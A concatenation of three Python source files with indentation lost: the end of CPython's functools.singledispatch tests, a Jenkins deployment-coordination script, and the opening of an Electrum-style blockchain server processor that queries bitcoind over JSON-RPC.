self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping, c.Sized,
c.Iterable, c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, c.OrderedDict]
for haystack in permutations(bases):
m = mro(c.ChainMap, haystack)
self.assertEqual(m, [c.ChainMap, c.MutableMapping, c.Mapping,
c.Sized, c.Iterable, c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(c.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [c.defaultdict, dict, c.Sized, c.Container,
object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(c.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence,
c.defaultdict, dict, c.MutableMapping,
c.Mapping, c.Sized, c.Reversible, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(c.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, c.defaultdict, dict, c.Mapping,
c.Sized, c.Iterable, c.Container, object])
def test_register_abc(self):
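# register progressively more specific ABCs and then concrete types, checking at
# each step that dispatch picks the most specific applicable implementation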
c = collections
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(c.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(c.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
_orig_wkd = functools.WeakKeyDictionary
td = TracingDict()
functools.WeakKeyDictionary = lambda: td
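# singledispatch builds its dispatch cache with functools.WeakKeyDictionary, so
# patching it before defining g below lets the test observe every cache read/write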
c = collections
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
functools.WeakKeyDictionary = _orig_wkd
if __name__ == '__main__':
unittest.main()
|
coordinate_script.py
|
#!/usr/bin/python
"""
"""
import os
#import sys
import ConfigParser
# import subprocess
import logging
import logging.handlers
import socket
import time
# import glob
import threading
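# threading: likely used further down (in the Main section) to run appDeploy
# against several servers in parallel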
# ####################################### Start of Classes ##########################################
class getProps(object):
# ---------------------------------------------------------------------------------------------------
# getProps - Gets parameters for this script from:
# OS, Job Submission, Jenkins Coordinate Property File, Server Property File
# ---------------------------------------------------------------------------------------------------
def __init__(self):
logger.debug('Got Properties For: ' + os.environ.get('JOB_NAME'))
self.globalErrorCode = 0
#-----------------------------------------------------------------------------------------
# OS Properties (From the Jenkins Job Submission and Jenkins Environment)
#-----------------------------------------------------------------------------------------
self.hostname = socket.getfqdn()
self.nodeName = os.environ.get('NODE_NAME')
self.workspace = os.environ.get('WORKSPACE')
self.jobname = os.environ.get('JOB_NAME')
self.ops_env = self.jobname.split("_")[0]
self.CustomerEnvironment = os.environ.get('Customer_Environment')
self.custEnvProps = self.ops_env + '_Customer_Environments.properties'
#Deploy Parameters
self.ReleaseBuildName = os.environ.get('Release_Build_Name')
if self.ReleaseBuildName is None:
self.ReleaseBuildName = ''
# Print OS/Submission Properties
logger.debug('Hostname'.ljust(msgFiller,' ') + '= ' + self.hostname)
logger.debug('NODE_NAME'.ljust(msgFiller,' ') + '= ' + self.nodeName)
logger.debug('Workspace'.ljust(msgFiller,' ') + '= ' + self.workspace)
logger.debug('operating Environment'.ljust(msgFiller, ' ') + '= ' + self.ops_env)
logger.info('CustomerEnvironment'.ljust(msgFiller,' ') + '= ' + self.CustomerEnvironment)
if (self.ReleaseBuildName != ''):
logger.info('ReleaseBuildName'.ljust(msgFiller,' ') + '= ' + self.ReleaseBuildName)
# -----------------------------------------------------------------------------------------
# Global Environment Properties (parameters that are common to all environments)
# -----------------------------------------------------------------------------------------
# cp = ConfigParser.ConfigParser()
# coordinatePropsFName = self.workspace + '/Coordinate.properties'
# logger.debug('Coordinate_Properties'.ljust(msgFiller, ' ') + '= ' + coordinatePropsFName)
# cp.read(coordinatePropsFName)
#
# self.mailhost = cp.get('main', 'mailhost')
#
# # Print Global Properties Main
# logger.debug('mailhost'.ljust(msgFiller,' ') + '= ' + self.mailhost)
# logger.debug('custEnvProps'.ljust(msgFiller,' ') + '= ' + self.custEnvProps)
# logger.info('appProduct'.ljust(msgFiller,' ') + '= ' + appProduct)
# -----------------------------------------------------------------------------------------
# Specific Server Properties for the Customer Environment(TSM/UAT/PROD)
# -----------------------------------------------------------------------------------------
cp1 = ConfigParser.ConfigParser()
CustEnvPropsFName = self.workspace + '/' + self.custEnvProps
logger.debug('CustEnv Properties'.ljust(msgFiller, ' ') + '= ' + CustEnvPropsFName)
cp1.read(CustEnvPropsFName)
self.servers = cp1.get(self.CustomerEnvironment, 'servers').split(',')
try:
self.tomcatHome = cp1.get(self.CustomerEnvironment, 'tomcatHome')
except ConfigParser.Error:
self.tomcatHome = ''
try:
self.appHostPort = cp1.get(self.CustomerEnvironment, 'appHostPort')
except ConfigParser.Error:
self.appHostPort = ''
logger.info('servers'.ljust(msgFiller,' ') + '= ' + str(self.servers))
logger.debug('tomcatHome'.ljust(msgFiller,' ') + '= ' + self.tomcatHome)
logger.debug('appHostPort'.ljust(msgFiller,' ') + '= ' + self.appHostPort)
logger.info(' ')
return
# ####################################### End of Classes ############################################
# ####################################### Start of Functions ########################################
def appDeploy(hostname):
logger.info(hostname + ': deploy ' + appProduct)
# ####################################### Start of Main #############################################
def main():
# ---------------------------------------------------------------------------------------------------
    # main - sets logging and coordinates this script's processing.
# ---------------------------------------------------------------------------------------------------
global logger
global props
global appProduct
global logPrefix
global msgPrefix
global msgFiller
msgPrefix = '***** '
msgFiller = 25
#---------------------------------------------------------------------------------------------------
# Setup Logger and other Variables for this script
#---------------------------------------------------------------------------------------------------
customerEnvironment = os.environ.get('Customer_Environment')
if customerEnvironment.rfind('_') != -1:
idx = customerEnvironment.rfind('_') + 1
appProduct = customerEnvironment[idx:]
else:
appProduct = 'NA'
logPrefix = customerEnvironment.replace('_','-')
    # Set Logger
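    # Logging fans out to three handlers: a DEBUG-level log file, an
    # INFO-level log file, and an INFO-level stream handler for the Jenkins
    # job console output.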
    logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
nowtime = time.strftime("%Y-%m-%d-%H%M%S", time.localtime())
jenkinsLogDebug = os.environ.get('WORKSPACE') + '/' + logPrefix + '-jenkinsLogDebug-' + nowtime + '.log'
jenkinsLogInfo = os.environ.get('WORKSPACE') + '/' + logPrefix + '-jenkinsLogInfo-' + nowtime + '.log'
outformat = logging.Formatter('%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
fh = logging.FileHandler(jenkinsLogDebug)
fh.setLevel(logging.DEBUG)
fh.setFormatter(outformat)
logger.addHandler(fh)
fh1 = logging.FileHandler(jenkinsLogInfo)
fh1.setLevel(logging.INFO)
fh1.setFormatter(outformat)
logger.addHandler(fh1)
# Jenkins Job Console Output
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
ch.setFormatter(outformat)
logger.addHandler(ch)
logger.info(msgPrefix)
logger.info(msgPrefix + 'START - Jenkins Job: ' + os.environ.get('JOB_NAME'))
logger.info(msgPrefix)
logger.debug('logPrefix = ' + logPrefix)
logger.debug('appProduct = ' + appProduct)
#---------------------------------------------------------------------------------------------------
    # Get Properties/Parameters for the requested job
#---------------------------------------------------------------------------------------------------
props = getProps()
props.appProduct = appProduct
props.jenkinsLogDebug = jenkinsLogDebug
props.jenkinsLogInfo = jenkinsLogInfo
props.globalErrorCode = 0
props.logfilelist = []
msgProduct = appProduct
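    # Deploy to each server in turn; joining inside the loop means the
    # deployments run sequentially rather than in parallel.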
for singleserver in props.servers:
logger.info(' ')
t = threading.Thread(target=appDeploy, args=(singleserver,))
t.start()
t.join()
logger.info(msgPrefix)
logger.info(msgPrefix + 'END - Jenkins Job: ' + os.environ.get('JOB_NAME'))
logger.info(msgPrefix)
#---------------------------------------------------------------------------------------------------
# Execute MAIN CODE
#---------------------------------------------------------------------------------------------------
if __name__ == '__main__':
try:
main()
    except Exception as e:
        print 'coordinate_script failed: %s' % e
        raise
|
blockchain_processor.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
from json import dumps, load
import os
from Queue import Queue
import random
import sys
import time
import threading
import urllib
#from calendar import timegm
#from time import strptime
#from datetime import datetime
import deserialize
from processor import Processor, print_log
from storage import Storage
from utils import logger, hash_decode, hash_encode, Hash, HashX13, header_from_string, header_to_string, ProfiledThread, \
rev_hex, int_to_hex4
import traceback
class BlockchainProcessor(Processor):
def __init__(self, config, shared):
Processor.__init__(self)
# monitoring
self.avg_time = 0,0,0
self.time_ref = time.time()
self.shared = shared
self.config = config
self.up_to_date = False
self.watch_lock = threading.Lock()
self.watch_blocks = []
self.watch_headers = []
self.watched_addresses = {}
self.history_cache = {}
self.merkle_cache = {}
self.max_cache_size = 100000
self.chunk_cache = {}
self.cache_lock = threading.Lock()
self.headers_data = ''
self.headers_path = config.get('leveldb', 'path')
self.mempool_fees = {}
self.mempool_values = {}
self.mempool_addresses = {}
self.mempool_hist = {} # addr -> (txid, delta)
self.mempool_unconfirmed = {} # txid -> set of unconfirmed inputs
self.mempool_hashes = set()
self.mempool_lock = threading.Lock()
self.address_queue = Queue()
try:
self.test_reorgs = config.getboolean('leveldb', 'test_reorgs') # simulate random blockchain reorgs
except:
self.test_reorgs = False
self.storage = Storage(config, shared, self.test_reorgs)
self.bitcoind_url = 'http://%s:%s@%s:%s/' % (
config.get('bitcoind', 'bitcoind_user'),
config.get('bitcoind', 'bitcoind_password'),
config.get('bitcoind', 'bitcoind_host'),
config.get('bitcoind', 'bitcoind_port'))
self.sent_height = 0
self.sent_header = None
# catch_up headers
self.init_headers(self.storage.height)
# start catch_up thread
if config.getboolean('leveldb', 'profiler'):
filename = os.path.join(config.get('leveldb', 'path'), 'profile')
print_log('profiled thread', filename)
self.blockchain_thread = ProfiledThread(filename, target = self.do_catch_up)
else:
self.blockchain_thread = threading.Thread(target = self.do_catch_up)
self.blockchain_thread.start()
def do_catch_up(self):
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
self.catch_up(sync=False)
if not self.shared.stopped():
print_log("Blockchain is up to date.")
self.memorypool_update()
print_log("Memory pool initialized.")
while not self.shared.stopped():
self.main_iteration()
if self.shared.paused():
print_log("bitcoind is responding")
self.shared.unpause()
time.sleep(10)
def set_time(self):
self.time_ref = time.time()
def print_time(self, num_tx):
delta = time.time() - self.time_ref
# leaky averages
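        # seconds_per_block is an exponentially weighted moving average,
        # new = (1 - alpha) * old + alpha * sample, where alpha starts at 1
        # and decays towards 0.01 as the sample count n grows;
        # tx_per_second uses a time-weighted variant of the same scheme.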
seconds_per_block, tx_per_second, n = self.avg_time
alpha = (1. + 0.01 * n)/(n+1)
seconds_per_block = (1-alpha) * seconds_per_block + alpha * delta
alpha2 = alpha * delta / seconds_per_block
tx_per_second = (1-alpha2) * tx_per_second + alpha2 * num_tx / delta
self.avg_time = seconds_per_block, tx_per_second, n+1
if self.storage.height%100 == 0 \
or (self.storage.height%10 == 0 and self.storage.height >= 100000)\
or self.storage.height >= 200000:
msg = "block %d (%d %.2fs) %s" %(self.storage.height, num_tx, delta, self.storage.get_root_hash().encode('hex'))
msg += " (%.2ftx/s, %.2fs/block)" % (tx_per_second, seconds_per_block)
run_blocks = self.storage.height - self.start_catchup_height
remaining_blocks = self.bitcoind_height - self.storage.height
if run_blocks>0 and remaining_blocks>0:
remaining_minutes = remaining_blocks * seconds_per_block / 60
new_blocks = int(remaining_minutes / 10) # number of new blocks expected during catchup
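                # The division by 10 assumes a ~10-minute block interval, so
                # the ETA also counts blocks expected to be mined meanwhile.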
blocks_to_process = remaining_blocks + new_blocks
minutes = blocks_to_process * seconds_per_block / 60
rt = "%.0fmin"%minutes if minutes < 300 else "%.1f hours"%(minutes/60)
msg += " (eta %s, %d blocks)" % (rt, remaining_blocks)
print_log(msg)
def wait_on_bitcoind(self):
self.shared.pause()
time.sleep(10)
if self.shared.stopped():
# this will end the thread
raise BaseException()
def bitcoind(self, method, params=()):
postdata = dumps({"method": method, 'params': params, 'id': 'jsonrpc'})
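        # Retry the JSON-RPC call until bitcoind answers; error code -28
        # means the daemon is still warming up, so wait and try again.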
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
print_log("cannot reach bitcoind...")
self.wait_on_bitcoind()
else:
if r['error'] is not None:
if r['error'].get('code') == -28:
print_log("bitcoind still warming up...")
self.wait_on_bitcoind()
continue
raise BaseException(r['error'])
break
return r.get('result')
@staticmethod
def block2header(b):
return {
"block_height": b.get('height'),
"version": b.get('version'),
"prev_block_hash": b.get('previousblockhash'),
"merkle_root": b.get('merkleroot'),
# "timestamp": timegm(strptime(datetime.fromtimestamp(b.get('time')), "%Y-%m-%d %H:%M:%S %Z")),
"timestamp": b.get('time'),
"bits": int(b.get('bits'), 16),
"nonce": b.get('nonce'),
}
def get_header(self, height):
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
return self.block2header(b)
def init_headers(self, db_height):
self.headers_filename = os.path.join(self.headers_path, 'blockchain_headers')
if os.path.exists(self.headers_filename):
height = os.path.getsize(self.headers_filename)/80 - 1 # the current height
if height > 0:
prev_hash = self.hash_header(self.read_header(height))
else:
prev_hash = None
else:
open(self.headers_filename, 'wb').close()
prev_hash = None
height = -1
if height < db_height:
print_log("catching up missing headers:", height, db_height)
try:
while height < db_height:
height += 1
header = self.get_header(height)
if height > 1:
if prev_hash != header.get('prev_block_hash'):
# The prev_hash block is orphaned, go back
print_log("reorganizing, a block in file is orphaned:", prev_hash)
# Go to the parent of the orphaned block
height -= 2
prev_hash = self.hash_header(self.read_header(height))
continue
self.write_header(header, sync=False)
prev_hash = self.hash_header(header)
if (height % 1000) == 0:
print_log("headers file:", height)
except KeyboardInterrupt:
self.flush_headers()
sys.exit()
self.flush_headers()
@staticmethod
def hash_header(header):
# return rev_hex(Hash(header_to_string(header).decode('hex')).encode('hex'))
return rev_hex(HashX13(header_to_string(header).decode('hex')).encode('hex'))
def read_header(self, block_height):
if os.path.exists(self.headers_filename):
with open(self.headers_filename, 'rb') as f:
f.seek(block_height * 80)
h = f.read(80)
if len(h) == 80:
h = header_from_string(h)
return h
def read_chunk(self, index):
with open(self.headers_filename, 'rb') as f:
f.seek(index*2016*80)
chunk = f.read(2016*80)
return chunk.encode('hex')
def write_header(self, header, sync=True):
if not self.headers_data:
self.headers_offset = header.get('block_height')
self.headers_data += header_to_string(header).decode('hex')
if sync or len(self.headers_data) > 40*100:
self.flush_headers()
with self.cache_lock:
chunk_index = header.get('block_height')/2016
if chunk_index in self.chunk_cache:
del self.chunk_cache[chunk_index]
def pop_header(self):
# we need to do this only if we have not flushed
if self.headers_data:
self.headers_data = self.headers_data[:-40]
def flush_headers(self):
if not self.headers_data:
return
with open(self.headers_filename, 'rb+') as f:
f.seek(self.headers_offset*80)
f.write(self.headers_data)
self.headers_data = ''
def get_chunk(self, i):
        # chunks are read from the headers file on disk and cached in memory
with self.cache_lock:
chunk = self.chunk_cache.get(i)
if not chunk:
chunk = self.read_chunk(i)
if chunk:
self.chunk_cache[i] = chunk
return chunk
def get_mempool_transaction(self, txid):
try:
raw_tx = self.bitcoind('getrawtransaction', (txid, 0))
except:
return None
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
return deserialize.parse_Transaction(vds, is_coinbase=False)
except:
print_log("ERROR: cannot parse", txid)
return None
def get_unconfirmed_history(self, addr):
hist = []
with self.mempool_lock:
for tx_hash, delta in self.mempool_hist.get(addr, ()):
height = -1 if self.mempool_unconfirmed.get(tx_hash) else 0
fee = self.mempool_fees.get(tx_hash)
hist.append({'tx_hash':tx_hash, 'height':height, 'fee':fee})
return hist
def get_history(self, addr, cache_only=False):
with self.cache_lock:
hist = self.history_cache.get(addr)
if hist is not None:
return hist
if cache_only:
return -1
hist = self.storage.get_history(addr)
hist.extend(self.get_unconfirmed_history(addr))
with self.cache_lock:
if len(self.history_cache) > self.max_cache_size:
logger.info("clearing cache")
self.history_cache.clear()
self.history_cache[addr] = hist
return hist
    def get_unconfirmed_value(self, addr):
        # mempool_hist maps addr -> list of (txid, delta) pairs; the net
        # unconfirmed value is the sum of those deltas (get_unconfirmed_history
        # returns dicts without the delta, so it is not usable here).
        with self.mempool_lock:
            return sum(delta for _tx_hash, delta in self.mempool_hist.get(addr, ()))
def get_status(self, addr, cache_only=False):
tx_points = self.get_history(addr, cache_only)
if cache_only and tx_points == -1:
return -1
if not tx_points:
return None
if tx_points == ['*']:
return '*'
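        # The address status is the sha256 of the concatenated
        # "txid:height:" strings of its history, returned hex-encoded.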
status = ''.join(tx.get('tx_hash') + ':%d:' % tx.get('height') for tx in tx_points)
return hashlib.sha256(status).digest().encode('hex')
def get_merkle(self, tx_hash, height, cache_only):
with self.cache_lock:
out = self.merkle_cache.get(tx_hash)
if out is not None:
return out
if cache_only:
return -1
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
tx_list = b.get('tx')
tx_pos = tx_list.index(tx_hash)
merkle = map(hash_decode, tx_list)
target_hash = hash_decode(tx_hash)
s = []
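        # Build the merkle branch for target_hash: at each level, duplicate
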